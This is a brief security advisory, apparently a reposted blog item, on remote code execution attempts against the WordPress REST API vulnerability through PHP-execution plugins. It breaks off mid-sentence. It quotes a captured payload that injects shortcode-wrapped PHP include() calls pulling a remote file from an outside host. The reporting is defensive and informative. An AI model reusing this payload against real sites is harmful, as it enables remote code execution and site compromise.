RCE Attempts Against the Latest WordPress REST API Vulnerability

We are starting to see remote command execution (RCE) attempts trying to exploit the latest WordPress REST API Vulnerability. These RCE attempts started today after a few days of attackers (mostly defacers) rushing to vandalize as many pages as they could. The RCE attempts we are seeing in the wild do not affect every WordPress sites, only the ones using plugins that allow for PHP execution from within posts and pages.
Attacks in the Wild
The attackers in the wild are trying to exploit sites that have plugins like the Insert PHP (100k+ installs), Exec-PHP (100k+ installs) and similar installed plugins. These plugins, allow users to insert PHP code directly into the posts as a way to make customizations easier. Coupled with this vulnerability, it allows the attackers to execute PHP code when injecting their content into the database.
For example, this first campaign we are seeing is trying to inject a PHP include to content of different posts to see if it gets executed. This is the payload:
content:"[insert_php] include(‘http[:]//acommeamour.fr/tmp/xx.php’); [/insert_php]
[php] include(‘http[:]//acommeamour.fr/tmp/xx.php’); [/php]",
"id":"61a"}
It tries
Source: https://managewp.org/articles/14374/rce-attempts-against-the-latest-wordpress-rest-api-vulnerability

source https://williechiu40.wordpress.com/2017/02/10/rce-attempts-against-the-latest-wordpress-rest-api-vulnerability/